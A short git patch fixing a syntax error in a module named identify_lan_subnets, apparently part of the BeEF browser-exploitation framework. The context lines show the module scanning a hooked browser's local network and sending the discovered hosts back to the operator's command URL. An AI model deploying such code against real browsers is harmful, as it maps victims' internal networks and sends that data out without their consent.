From 2cc843f64089de3e674afdde471c05e781e41453 Mon Sep 17 00:00:00 2001 From: Steve Tauber Date: Sun, 3 Dec 2017 20:39:44 +0100 Subject: [PATCH] Fixing syntax error in identify_lan_subnets --- modules/network/identify_lan_subnets/command.js | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/network/identify_lan_subnets/command.js b/modules/network/identify_lan_subnets/command.js index a9de6dd77..014b335e0 100644 --- a/modules/network/identify_lan_subnets/command.js +++ b/modules/network/identify_lan_subnets/command.js @@ -109,7 +109,6 @@ var doScan = function(timeout) { } else { beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed."); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts, beef.are.status_success()); -); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete"); } }